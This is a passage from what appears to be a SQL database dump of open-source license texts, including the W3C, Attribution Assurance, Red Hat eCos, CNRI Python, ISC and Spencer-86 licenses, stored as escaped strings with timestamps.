Schutzmaßnahme\nangesehen.\n\n \n\n § 9 Text der Lizenz\n\n(1) Diese Lizenz ist in deutscher und englischer Sprache abgefasst. Beide\nFassungen sind gleich verbindlich. Es wird unterstellt, dass die in der Lizenz\nverwandten Begriffe in beiden Fassungen dieselbe Bedeutung haben. Ergeben\nsich dennoch Unterschiede, so ist die Bedeutung maßgeblich, welche die Fassungen\nunter Berücksichtigung des Ziels und Zwecks der Lizenz am besten miteinander\nin Einklang bringt.\n\n(2) Der Lizenzrat der Deutschen Freien Software Lizenz kann mit verbindlicher\nWirkung neue Versionen der Lizenz in Kraft setzen, soweit dies erforderlich\nund zumutbar ist. Neue Versionen der Lizenz werden auf der Internetseite http://www.d-fsl.de\nmit einer eindeutigen Versionsnummer veröffentlicht. Die neue Version der\nLizenz erlangt für Sie verbindliche Wirkung, wenn Sie von deren Veröffentlichung\nKenntnis genommen haben. Gesetzliche Rechtsbehelfe gegen die Änderung der\nLizenz werden durch die vorstehenden Bestimmungen nicht beschränkt.\n\n(3) Sie dürfen diese Lizenz in unveränderter Form vervielfältigen, verbreiten\nund öffentlich zugänglich machen.\n\n \n\n § 10 Anwendbares Recht\n\n Auf diese Lizenz findet deutsches Recht Anwendung.\n\nAnhang: Wie unterstellen Sie ein Programm der Deutschen Freien Software Lizenz?\n\nUm jedermann den Abschluss dieser Lizenz zu ermöglichen, wird empfohlen, das\nProgramm mit folgendem Hinweis auf die Lizenz zu versehen:\n\n \"Copyright (C) 20[jj] [Name des Rechtsinhabers].\n\nDieses Programm kann durch jedermann gemäß den Bestimmungen der Deutschen\nFreien Software Lizenz genutzt werden.\n\n Die Lizenz kann unter http://www.d-fsl.de abgerufen werden.\"\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(279,'W3C','W3C SOFTWARE NOTICE AND LICENSE\n\nThis work (and included software, documentation such as READMEs, or other\nrelated items) is being provided by the copyright holders under the following\nlicense.\n\nLicense\n\nBy obtaining, using and/or copying this work, you (the licensee) agree that\nyou have read, understood, and will comply with the following terms and conditions.\n\nPermission to copy, modify, and distribute this software and its documentation,\nwith or without modification, for any purpose and without fee or royalty is\nhereby granted, provided that you include the following on ALL copies of the\nsoftware and documentation or portions thereof, including modifications:\n\nThe full text of this NOTICE in a location viewable to users of the redistributed\nor derivative work.\n\nAny pre-existing intellectual property disclaimers, notices, or terms and\nconditions. If none exist, the W3C Software Short Notice should be included\n(hypertext is preferred, text is permitted) within the body of any redistributed\nor derivative code.\n\nNotice of any changes or modifications to the files, including the date changes\nwere made. (We recommend you provide URIs to the location from which the code\nis derived.)\n\nDisclaimers\n\nTHIS SOFTWARE AND DOCUMENTATION IS PROVIDED \"AS IS,\" AND COPYRIGHT HOLDERS\nMAKE NO REPRESENTATIONS OR WARRANTIES, EXPRESS OR IMPLIED, INCLUDING BUT NOT\nLIMITED TO, WARRANTIES OF MERCHANTABILITY OR FITNESS FOR ANY PARTICULAR PURPOSE\nOR THAT THE USE OF THE SOFTWARE OR DOCUMENTATION WILL NOT INFRINGE ANY THIRD\nPARTY PATENTS, COPYRIGHTS, TRADEMARKS OR OTHER RIGHTS.\n\nCOPYRIGHT HOLDERS WILL NOT BE LIABLE FOR ANY DIRECT, INDIRECT, SPECIAL OR\nCONSEQUENTIAL DAMAGES ARISING OUT OF ANY USE OF THE SOFTWARE OR DOCUMENTATION.\n\nThe name and trademarks of copyright holders may NOT be used in advertising\nor publicity pertaining to the software without specific, written prior permission.\nTitle to copyright in this software and any associated documentation will\nat all times remain with copyright holders. Notes\n\nThis version: http://www.w3.org/Consortium/Legal/2002/copyright-software-20021231\n\nThis formulation of W3C\'s notice and license became active on December 31\n2002. This version removes the copyright ownership notice such that this license\ncan be used with materials other than those owned by the W3C, reflects that\nERCIM is now a host of the W3C, includes references to this specific dated\nversion of the license, and removes the ambiguous grant of \"use\". Otherwise,\nthis version is the same as the previous version and is written so as to preserve\nthe Free Software Foundation\'s assessment of GPL compatibility and OSI\'s certification\nunder the Open Source Definition.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(280,'Linux-syscall-note','NOTE! This copyright does *not* cover user programs that use kernel services by normal system calls - this is merely considered normal use of the kernel, and does *not* fall under the heading of \"derived work\". Also note that the GPL below is copyrighted by the Free Software Foundation, but the instance of code that it refers to (the Linux kernel) is copyrighted by me and others who actually wrote it.\n\nAlso note that the only valid version of the GPL as far as the kernel is concerned is _this_ particular version of the license (ie v2, not v2.2 or v3.x or whatever), unless explicitly otherwise stated.\n\nLinus Torvalds\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(281,'AAL','Attribution Assurance License\n\nCopyright (c) 2002 by AUTHOR PROFESSIONAL IDENTIFICATION * URL \"PROMOTIONAL\nSLOGAN FOR AUTHOR\'S PROFESSIONAL PRACTICE\"\n\nAll Rights Reserved ATTRIBUTION ASSURANCE LICENSE (adapted from the original\nBSD license)\n\nRedistribution and use in source and binary forms, with or without modification,\nare permitted provided that the conditions below are met. These conditions\nrequire a modest attribution to <AUTHOR> (the \"Author\"), who hopes that its\npromotional value may help justify the thousands of dollars in otherwise billable\ntime invested in writing this and other freely available, open-source software.\n\n1. Redistributions of source code, in whole or part and with or without modification\n(the \"Code\"), must prominently display this GPG-signed text in verifiable\nform.\n\n2. Redistributions of the Code in binary form must be accompanied by this\nGPG-signed text in any documentation and, each time the resulting executable\nprogram or a program dependent thereon is launched, a prominent display (e.g.,\nsplash screen or banner text) of the Author\'s attribution information, which\nincludes:\n\n (a) Name (\"AUTHOR\"),\n\n (b) Professional identification (\"PROFESSIONAL IDENTIFICATION\"), and\n\n (c) URL (\"URL\").\n\n3. Neither the name nor any trademark of the Author may be used to endorse\nor promote products derived from this software without specific prior written\npermission.\n\n4. Users are entirely responsible, to the exclusion of the Author and any\nother persons, for compliance with (1) regulations set by owners or administrators\nof employed equipment, (2) licensing terms of any other software, and (3)\nlocal regulations regarding use, including those regarding import, export,\nand use of encryption software.\n\nTHIS FREE SOFTWARE IS PROVIDED BY THE AUTHOR \"AS IS\" AND ANY EXPRESS OR IMPLIED\nWARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY\nAND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE\nAUTHOR OR ANY CONTRIBUTOR BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,\nSPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,\nEFFECTS OF UNAUTHORIZED OR MALICIOUS NETWORK ACCESS; PROCUREMENT OF SUBSTITUTE\nGOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)\nHOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT\nLIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY\nOUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH\nDAMAGE.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(282,'RHeCos-1.1','Red Hat eCos Public License v1.1\n\n 1. DEFINITIONS\n\n1.1. \"Contributor\" means each entity that creates or contributes to the creation\nof Modifications.\n\n1.2. \"Contributor Version\" means the combination of the Original Code, prior\nModifications used by a Contributor, and the Modifications made by that particular\nContributor.\n\n1.3. \"Covered Code\" means the Original Code or Modifications or the combination\nof the Original Code and Modifications, in each case including portions thereof.\n\n1.4. \"Electronic Distribution Mechanism\" means a mechanism generally accepted\nin the software development community for the electronic transfer of data.\n\n 1.5. \"Executable\" means Covered Code in any form other than Source Code.\n\n1.6. \"Initial Developer\" means the individual or entity identified as the\nInitial Developer in the Source Code notice required by Exhibit A.\n\n1.7. \"Larger Work\" means a work which combines Covered Code or portions thereof\nwith code not governed by the terms of this License.\n\n 1.8. \"License\" means this document.\n\n1.9. \"Modifications\" means any addition to or deletion from the substance\nor structure of either the Original Code or any previous Modifications. When\nCovered Code is released as a series of files, a Modification is:\n\nA. Any addition to or deletion from the contents of a file containing Original\nCode or previous Modifications.\n\nB. Any new file that contains any part of the Original Code or previous Modifications.\n\n1.10. \"Original Code\" means Source Code of computer software code which is\ndescribed in the Source Code notice required by Exhibit A as Original Code,\nand which, at the time of its release under this License is not already Covered\nCode governed by this License.\n\n1.11. \"Source Code\" means the preferred form of the Covered Code for making\nmodifications to it, including all modules it contains, plus any associated\ninterface definition files, scripts used to control compilation and installation\nof an Executable, or a list of source code differential comparisons against\neither the Original Code or another well known, available Covered Code of\nthe Contributor\'s choice. The Source Code can be in a compressed or archival\nform, provided the appropriate decompression or de-archiving software is widely\navailable for no charge.\n\n1.12. \"You\" means an individual or a legal entity exercising rights under,\nand complying with all of the terms of, this License or a future version of\nthis License issued under Section 6.1. For legal entities, \"You\" includes\nany entity which controls, is controlled by, or is under common control with\nYou. For purposes of this definition, \"control\" means (a) the power, direct\nor indirect, to cause the direction or management of such entity, whether\nby contract or otherwise, or (b) ownership of fifty percent (50%) or more\nof the outstanding shares or beneficial ownership of such entity.\n\n1.13. \"Red Hat Branded Code\" is code that Red Hat distributes and/or permits\nothers to distribute under different terms than the Red Hat eCos Public License.\nRed Hat\'s Branded Code may contain part or all of the Covered Code.\n\n 2. SOURCE CODE LICENSE\n\n2.1. The Initial Developer Grant. The Initial Developer hereby grants You\na world-wide, royalty-free, non-exclusive license, subject to third party\nintellectual property claims:\n\n(a) to use, reproduce, modify, display, perform, sublicense and distribute\nthe Original Code (or portions thereof) with or without Modifications, or\nas part of a Larger Work; and\n\n(b) under patents now or hereafter owned or controlled by Initial Developer,\nto make, have made, use and sell (\"Utilize\") the Original Code (or portions\nthereof), but solely to the extent that any such patent is reasonably necessary\nto enable You to Utilize the Original Code (or portions thereof) and not to\nany greater extent that may be necessary to Utilize further Modifications\nor combinations.\n\n2.2. Contributor Grant. Each Contributor hereby grants You a world-wide, royalty-free,\nnon-exclusive license, subject to third party intellectual property claims:\n\n(a) to use, reproduce, modify, display, perform, sublicense and distribute\nthe Modifications created by such Contributor (or portions thereof) either\non an unmodified basis, with other Modifications, as Covered Code or as part\nof a Larger Work; and\n\n(b) under patents now or hereafter owned or controlled by Contributor, to\nUtilize the Contributor Version (or portions thereof), but solely to the extent\nthat any such patent is reasonably necessary to enable You to Utilize the\nContributor Version (or portions thereof), and not to any greater extent that\nmay be necessary to Utilize further Modifications or combinations.\n\n 3. DISTRIBUTION OBLIGATIONS\n\n3.1. Application of License. The Modifications which You create or to which\nYou contribute are governed by the terms of this License, including without\nlimitation Section 2.2. The Source Code version of Covered Code may be distributed\nonly under the terms of this License or a future version of this License released\nunder Section 6.1, and You must include a copy of this License with every\ncopy of the Source Code You distribute. You may not offer or impose any terms\non any Source Code version that alters or restricts the applicable version\nof this License or the recipients\' rights hereunder. However, You may include\nan additional document offering the additional rights described in Section\n3.5.\n\n3.2. Availability of Source Code. Any Modification which You create or to\nwhich You contribute must be made available in Source Code form under the\nterms of this License via an accepted Electronic Distribution Mechanism to\nanyone to whom you made an Executable version available and to the Initial\nDeveloper; and if made available via Electronic Distribution Mechanism, must\nremain available for at least twelve (12) months after the date it initially\nbecame available, or at least six (6) months after a subsequent version of\nthat particular Modification has been made available to such recipients. You\nare responsible for ensuring that the Source Code version remains available\neven if the Electronic Distribution Mechanism is maintained by a third party.\nYou are responsible for notifying the Initial Developer of the Modification\nand the location of the Source if a contact means is provided. Red Hat will\nbe acting as maintainer of the Source and may provide an Electronic Distribution\nmechanism for the Modification to be made available. You can contact Red Hat\nto make the Modification available and to notify the Initial Developer. (http://sourceware.cygnus.com/ecos/)\n\n3.3. Description of Modifications. You must cause all Covered Code to which\nyou contribute to contain a file documenting the changes You made to create\nthat Covered Code and the date of any change. You must include a prominent\nstatement that the Modification is derived, directly or indirectly, from Original\nCode provided by the Initial Developer and including the name of the Initial\nDeveloper in (a) the Source Code, and (b) in any notice in an Executable version\nor related documentation in which You describe the origin or ownership of\nthe Covered Code.\n\n 3.4. Intellectual Property Matters\n\n(a) Third Party Claims. If You have knowledge that a party claims an intellectual\nproperty right in particular functionality or code (or its utilization under\nthis License), you must include a text file with the source code distribution\ntitled \"LEGAL\" which describes the claim and the party making the claim in\nsufficient detail that a recipient will know whom to contact. If you obtain\nsuch knowledge after You make Your Modification available as described in\nSection 3.2, You shall promptly modify the LEGAL file in all copies You make\navailable thereafter and shall take other steps (such as notifying appropriate\nmailing lists or newsgroups) reasonably calculated to inform those who received\nthe Covered Code that new knowledge has been obtained.\n\n(b) Contributor APIs. If Your Modification is an application programming interface\nand You own or control patents which are reasonably necessary to implement\nthat API, you must also include this information in the LEGAL file.\n\n3.5. Required Notices. You must duplicate the notice in Exhibit A in each\nfile of the Source Code, and this License in any documentation for the Source\nCode, where You describe recipients\' rights relating to Covered Code. If You\ncreated one or more Modification(s), You may add your name as a Contributor\nto the Source Code. If it is not possible to put such notice in a particular\nSource Code file due to its structure, then you must include such notice in\na location (such as a relevant directory file) where a user would be likely\nto look for such a notice. You may choose to offer, and to charge a fee for,\nwarranty, support, indemnity or liability obligations to one or more recipients\nof Covered Code.\n\nHowever, You may do so only on Your own behalf, and not on behalf of the Initial\nDeveloper or any Contributor. You must make it absolutely clear that any such\nwarranty, support, indemnity or liability obligation is offered by You alone,\nand You hereby agree to indemnify the Initial Developer and every Contributor\nfor any liability incurred by the Initial Developer or such Contributor as\na result of warranty, support, indemnity or liability terms You offer.\n\n3.6. Distribution of Executable Versions. You may distribute Covered Code\nin Executable form only if the requirements of Section 3.1-3.5 have been met\nfor that Covered Code, and if You include a notice stating that the Source\nCode version of the Covered Code is available under the terms of this License,\nincluding a description of how and where You have fulfilled the obligations\nof Section 3.2. The notice must be conspicuously included in any notice in\nan Executable version, related documentation or collateral in which You describe\nrecipients\' rights relating to the Covered Code. You may distribute the Executable\nversion of Covered Code under a license of Your choice, which may contain\nterms different from this License, provided that You are in compliance with\nthe terms of this License and that the license for the Executable version\ndoes not attempt to limit or alter the recipient\'s rights in the Source Code\nversion from the rights set forth in this License. If You distribute the Executable\nversion under a different license You must make it absolutely clear that any\nterms which differ from this License are offered by You alone, not by the\nInitial Developer or any Contributor. You hereby agree to indemnify the Initial\nDeveloper and every Contributor for any liability incurred by the Initial\nDeveloper or such Contributor as a result of any such terms You offer.\n\nIf you distribute executable versions containing Covered Code, you must reproduce\nthe notice in Exhibit B in the documentation and/or other materials provided\nwith the product.\n\n3.7. Larger Works. You may create a Larger Work by combining Covered Code\nwith other code not governed by the terms of this License and distribute the\nLarger Work as a single product. In such a case, You must make sure the requirements\nof this License are fulfilled for the Covered Code.\n\n 4. INABILITY TO COMPLY DUE TO STATUTE OR REGULATION\n\nIf it is impossible for You to comply with any of the terms of this License\nwith respect to some or all of the Covered Code due to statute or regulation\nthen You must: (a) comply with the terms of this License to the maximum extent\npossible; (b) cite the statute or regulation that prohibits you from adhering\nto the license; and (c) describe the limitations and the code they affect.\nSuch description must be included in the LEGAL file described in Section 3.4\nand must be included with all distributions of the Source Code. Except to\nthe extent prohibited by statute or regulation, such description must be sufficiently\ndetailed for a recipient of ordinary skill to be able to understand it. You\nmust submit this LEGAL file to Red Hat for review, and You will not be able\nuse the covered code in any means until permission is granted from Red Hat\nto allow for the inability to comply due to statute or regulation.\n\n 5. APPLICATION OF THIS LICENSE\n\nThis License applies to code to which the Initial Developer has attached the\nnotice in Exhibit A, and to related Covered Code.\n\nRed Hat may include Covered Code in products without such additional products\nbecoming subject to the terms of this License, and may license such additional\nproducts on different terms from those contained in this License.\n\nRed Hat may license the Source Code of Red Hat Branded Code without Red Hat\nBranded Code becoming subject to the terms of this License, and may license\nRed Hat Branded Code on different terms from those contained in this License.\nContact Red Hat for details of alternate licensing terms available.\n\n 6. VERSIONS OF THE LICENSE\n\n6.1. New Versions. Red Hat may publish revised and/or new versions of the\nLicense from time to time. Each version will be given a distinguishing version\nnumber.\n\n6.2. Effect of New Versions. Once Covered Code has been published under a\nparticular version of the License, You may always continue to use it under\nthe terms of that version. You may also choose to use such Covered Code under\nthe terms of any subsequent version of the License published by Red Hat. No\none other than Red Hat has the right to modify the terms applicable to Covered\nCode beyond what is granted under this and subsequent Licenses.\n\n6.3. Derivative Works. If you create or use a modified version of this License\n(which you may only do in order to apply it to code which is not already Covered\nCode governed by this License), you must (a) rename Your license so that the\nphrases \"ECOS\", \"eCos\", \"Red Hat\", \"RHEPL\" or any confusingly similar phrase\ndo not appear anywhere in your license and (b) otherwise make it clear that\nyour version of the license contains terms which differ from the Red Hat eCos\nPublic License. (Filling in the name of the Initial Developer, Original Code\nor Contributor in the notice described in Exhibit A shall not of themselves\nbe deemed to be modifications of this License.)\n\n 7. DISCLAIMER OF WARRANTY\n\nCOVERED CODE IS PROVIDED UNDER THIS LICENSE ON AN \"AS IS\" BASIS, WITHOUT WARRANTY\nOF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, WITHOUT LIMITATION, WARRANTIES\nTHAT THE COVERED CODE IS FREE OF DEFECTS, MERCHANTABLE, FIT FOR A PARTICULAR\nPURPOSE OR NON-INFRINGING. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE\nOF THE COVERED CODE IS WITH YOU. SHOULD ANY COVERED CODE PROVE DEFECTIVE IN\nANY RESPECT, YOU (NOT THE INITIAL DEVELOPER OR ANY OTHER CONTRIBUTOR) ASSUME\nTHE COST OF ANY NECESSARY SERVICING, REPAIR OR CORRECTION. THIS DISCLAIMER\nOF WARRANTY CONSTITUTES AN ESSENTIAL PART OF THIS LICENSE. NO USE OF ANY COVERED\nCODE IS AUTHORIZED HEREUNDER EXCEPT UNDER THIS DISCLAIMER.\n\n 8. TERMINATION\n\nThis License and the rights granted hereunder will terminate automatically\nif You fail to comply with terms herein and fail to cure such breach within\n30 days of becoming aware of the breach. All sublicenses to the Covered Code\nwhich are properly granted shall survive any termination of this License.\nProvisions which, by their nature, must remain in effect beyond the termination\nof this License shall survive.\n\n 9. LIMITATION OF LIABILITY\n\nUNDER NO CIRCUMSTANCES AND UNDER NO LEGAL THEORY, WHETHER TORT (INCLUDING\nNEGLIGENCE), CONTRACT, OR OTHERWISE, SHALL THE INITIAL DEVELOPER, ANY OTHER\nCONTRIBUTOR, OR ANY DISTRIBUTOR OF COVERED CODE, OR ANY SUPPLIER OF ANY OF\nSUCH PARTIES, BE LIABLE TO YOU OR ANY OTHER PERSON FOR ANY INDIRECT, SPECIAL,\nINCIDENTAL, OR CONSEQUENTIAL DAMAGES OF ANY CHARACTER INCLUDING, WITHOUT LIMITATION,\nDAMAGES FOR LOSS OF GOODWILL, WORK STOPPAGE, COMPUTER FAILURE OR MALFUNCTION,\nOR ANY AND ALL OTHER COMMERCIAL DAMAGES OR LOSSES, EVEN IF SUCH PARTY SHALL\nHAVE BEEN INFORMED OF THE POSSIBILITY OF SUCH DAMAGES. THIS LIMITATION OF\nLIABILITY SHALL NOT APPLY TO LIABILITY FOR DEATH OR PERSONAL INJURY RESULTING\nFROM SUCH PARTY\'S NEGLIGENCE TO THE EXTENT APPLICABLE LAW PROHIBITS SUCH LIMITATION.\nSOME JURISDICTIONS DO NOT ALLOW THE EXCLUSION OR LIMITATION OF INCIDENTAL\nOR CONSEQUENTIAL DAMAGES, SO THAT EXCLUSION AND LIMITATION MAY NOT APPLY TO\nYOU.\n\n 10. U.S. GOVERNMENT END USERS\n\nThe Covered Code is a \"commercial item,\" as that term is defined in 48 C.F.R.\n2.101 (Oct. 1995), consisting of \"commercial computer software\" and \"commercial\ncomputer software documentation,\" as such terms are used in 48 C.F.R. 12.212\n(Sept. 1995). Consistent with 48 C.F.R. 12.212 and 48 C.F.R. 227.7202-1 through\n227.7202-4 (June 1995), all U.S. Government End Users acquire Covered Code\nwith only those rights set forth herein.\n\n 11. MISCELLANEOUS\n\nThis License represents the complete agreement concerning subject matter hereof.\nIf any provision of this License is held to be unenforceable, such provision\nshall be reformed only to the extent necessary to make it enforceable. This\nLicense shall be governed by California law provisions (except to the extent\napplicable law, if any, provides otherwise), excluding its conflict-of-law\nprovisions. With respect to disputes in which at least one party is a citizen\nof, or an entity chartered or registered to do business in, the United States\nof America: (a) unless otherwise agreed in writing, all disputes relating\nto this License (excepting any dispute relating to intellectual property rights)\nshall be subject to final and binding arbitration, with the losing party paying\nall costs of arbitration; (b) any arbitration relating to this Agreement shall\nbe held in Santa Clara County, California, under the auspices of JAMS/EndDispute;\nand (c) any litigation relating to this Agreement shall be subject to the\njurisdiction of the Federal Courts of the Northern District of California,\nwith venue lying in Santa Clara County, California, with the losing party\nresponsible for costs, including without limitation, court costs and reasonable\nattorneys fees and expenses. The application of the United Nations Convention\non Contracts for the International Sale of Goods is expressly excluded. Any\nlaw or regulation which provides that the language of a contract shall be\nconstrued against the drafter shall not apply to this License.\n\n 12. RESPONSIBILITY FOR CLAIMS\n\nExcept in cases where another Contributor has failed to comply with Section\n3.4, You are responsible for damages arising, directly or indirectly, out\nof Your utilization of rights under this License, based on the number of copies\nof Covered Code you made available, the revenues you received from utilizing\nsuch rights, and other relevant factors. You agree to work with affected parties\nto distribute responsibility on an equitable basis.\n\n 13. ADDITIONAL TERMS APPLICABLE TO THE RED HAT ECOS PUBLIC LICENSE\n\nNothing in this License shall be interpreted to prohibit Red Hat from licensing\nunder different terms than this License any code which Red Hat otherwise would\nhave a right to license.\n\nRed Hat and logo - This License does not grant any rights to use the trademark\nRed Hat, the Red Hat logo, eCos logo, even if such marks are included in the\nOriginal Code. You may contact Red Hat for permission to display the Red Hat\nand eCos marks in either the documentation or the Executable version beyond\nthat required in Exhibit B.\n\nInability to Comply Due to Contractual Obligation - To the extent that Red\nHat is limited contractually from making third party code available under\nthis License, Red Hat may choose to integrate such third party code into Covered\nCode without being required to distribute such third party code in Source\nCode form, even if such third party code would otherwise be considered \"Modifications\"\nunder this License. EXHIBIT A\n\n\"The contents of this file are subject to the Red Hat eCos Public License\nVersion 1.1 (the \"License\"); you may not use this file except in compliance\nwith the License. You may obtain a copy of the License at http://www.redhat.com/\n\nSoftware distributed under the License is distributed on an \"AS IS\" basis,\nWITHOUT WARRANTY OF ANY KIND, either express or implied. See the License for\nthe specific language governing rights and limitations under the License.\n\nThe Original Code is eCos - Embedded Configurable Operating System, released\nSeptember 30, 1998. The Initial Developer of the Original Code is Red Hat.\nPortions created by Red Hat are Copyright (C) 1998, 1999, 2000 Red Hat, Inc.\nAll Rights Reserved.\"\n\nEXHIBIT B\n\nPart of the software embedded in this product is eCos - Embedded Configurable\nOperating System, a trademark of Red Hat. Portions created by Red Hat are\nCopyright (C) 1998, 1999, 2000 Red Hat, Inc. (http://www.redhat.com/). All\nRights Reserved.\n\nTHE SOFTWARE IN THIS PRODUCT WAS IN PART PROVIDED BY RED HAT AND ANY EXPRESS\nOR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES\nOF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN\nNO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,\nSPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,\nPROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;\nOR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER\nIN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)\nARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE\nPOSSIBILITY OF SUCH DAMAGE.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(283,'CNRI-Python-GPL-Compatible','CNRI OPEN SOURCE GPL-COMPATIBLE LICENSE AGREEMENT\n\nIMPORTANT: PLEASE READ THE FOLLOWING AGREEMENT CAREFULLY.\n\nBY CLICKING ON \"ACCEPT\" WHERE INDICATED BELOW, OR BY COPYING, INSTALLING OR\nOTHERWISE USING PYTHON 1.6.1 SOFTWARE, YOU ARE DEEMED TO HAVE AGREED TO THE\nTERMS AND CONDITIONS OF THIS LICENSE AGREEMENT.\n\n1. This LICENSE AGREEMENT is between the Corporation for National Research\nInitiatives, having an office at 1895 Preston White Drive, Reston, VA 20191\n(\"CNRI\"), and the Individual or Organization (\"Licensee\") accessing and otherwise\nusing Python 1.6.1 software in source or binary form and its associated documentation.\n\n2. Subject to the terms and conditions of this License Agreement, CNRI hereby\ngrants Licensee a nonexclusive, royalty-free, world-wide license to reproduce,\nanalyze, test, perform and/or display publicly, prepare derivative works,\ndistribute, and otherwise use Python 1.6.1 alone or in any derivative version,\nprovided, however, that CNRI\'s License Agreement and CNRI\'s notice of copyright,\ni.e., \"Copyright © 1995-2001 Corporation for National Research Initiatives;\nAll Rights Reserved\" are retained in Python 1.6.1 alone or in any derivative\nversion prepared by Licensee. Alternately, in lieu of CNRI\'s License Agreement,\nLicensee may substitute the following text (omitting the quotes): \"Python\n1.6.1 is made available subject to the terms and conditions in CNRI\'s License\nAgreement. This Agreement together with Python 1.6.1 may be located on the\nInternet using the following unique, persistent identifier (known as a handle):\n1895.22/1013. This Agreement may also be obtained from a proxy server on the\nInternet using the following URL: http://hdl.handle.net/1895.22/1013\".\n\n3. In the event Licensee prepares a derivative work that is based on or incorporates\nPython 1.6.1 or any part thereof, and wants to make the derivative work available\nto others as provided herein, then Licensee hereby agrees to include in any\nsuch work a brief summary of the changes made to Python 1.6.1.\n\n4. CNRI is making Python 1.6.1 available to Licensee on an \"AS IS\" basis.\nCNRI MAKES NO REPRESENTATIONS OR WARRANTIES, EXPRESS OR IMPLIED. BY WAY OF\nEXAMPLE, BUT NOT LIMITATION, CNRI MAKES NO AND DISCLAIMS ANY REPRESENTATION\nOR WARRANTY OF MERCHANTABILITY OR FITNESS FOR ANY PARTICULAR PURPOSE OR THAT\nTHE USE OF PYTHON 1.6.1 WILL NOT INFRINGE ANY THIRD PARTY RIGHTS.\n\n5. CNRI SHALL NOT BE LIABLE TO LICENSEE OR ANY OTHER USERS OF PYTHON 1.6.1\nFOR ANY INCIDENTAL, SPECIAL, OR CONSEQUENTIAL DAMAGES OR LOSS AS A RESULT\nOF MODIFYING, DISTRIBUTING, OR OTHERWISE USING PYTHON 1.6.1, OR ANY DERIVATIVE\nTHEREOF, EVEN IF ADVISED OF THE POSSIBILITY THEREOF.\n\n6. This License Agreement will automatically terminate upon a material breach\nof its terms and conditions.\n\n7. This License Agreement shall be governed by the federal intellectual property\nlaw of the United States, including without limitation the federal copyright\nlaw, and, to the extent such U.S. federal law does not apply, by the law of\nthe Commonwealth of Virginia, excluding Virginia\'s conflict of law provisions.\nNotwithstanding the foregoing, with regard to derivative works based on Python\n1.6.1 that incorporate non-separable material that was previously distributed\nunder the GNU General Public License (GPL), the law of the Commonwealth of\nVirginia shall govern this License Agreement only as to issues arising under\nor with respect to Paragraphs 4, 5, and 7 of this License Agreement. Nothing\nin this License Agreement shall be deemed to create any relationship of agency,\npartnership, or joint venture between CNRI and Licensee. This License Agreement\ndoes not grant permission to use CNRI trademarks or trade name in a trademark\nsense to endorse or promote products or services of Licensee, or any third\nparty.\n\n8. By clicking on the \"ACCEPT\" button where indicated, or by copying, installing\nor otherwise using Python 1.6.1, Licensee agrees to be bound by the terms\nand conditions of this License Agreement. ACCEPT\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(284,'ISC','ISC License\n\nCopyright (c) 2004-2010 by Internet Systems Consortium, Inc. (\"ISC\")\n\nCopyright (c) 1995-2003 by Internet Software Consortium\n\nPermission to use, copy, modify, and /or distribute this software for any\npurpose with or without fee is hereby granted, provided that the above copyright\nnotice and this permission notice appear in all copies.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\" AND ISC DISCLAIMS ALL WARRANTIES WITH REGARD\nTO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS.\nIN NO EVENT SHALL ISC BE LIABLE FOR ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL\nDAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS,\nWHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING\nOUT OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(285,'Spencer-86','Copyright (c) 1986 by University of Toronto. Written by Henry Spencer. Not\nderived from licensed software.\n\nPermission is granted to anyone to use this software for any purpose on any\ncomputer system, and to redistribute it freely, subject to the following restrictions:\n\n1. The author is not responsible for the consequences of use of this software,\nno matter how awful, even if they arise from defects in it.\n\n2. The origin of this software must not be misrepresented, either by explicit\nclaim or by omission.\n\n3. Altered versions must be plainly marked as such, and must not be misrepresented\nas being the original software.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(286,'GFDL-1.2-only','GNU Free Documentation License\n\nVersion 1.2, November 2002\n\nCopyright (C) 2000,2001,2002 Free Software Foundation, Inc. 51 Franklin St,\nFifth Floor, Boston, MA 02110-1301 USA\n\nEveryone is permitted to copy and distribute verbatim copies of this license\ndocument, but changing it is not allowed.\n\n 0. PREAMBLE\n\nThe purpose of this License is to make a manual, textbook, or other functional\nand useful document \"free\" in the sense of freedom: to assure everyone the\neffective freedom to copy and redistribute it, with or without modifying it,\neither commercially or noncommercially. Secondarily, this License preserves\nfor the author and publisher a way to get credit for their work, while not\nbeing considered responsible for modifications made by others.\n\nThis License 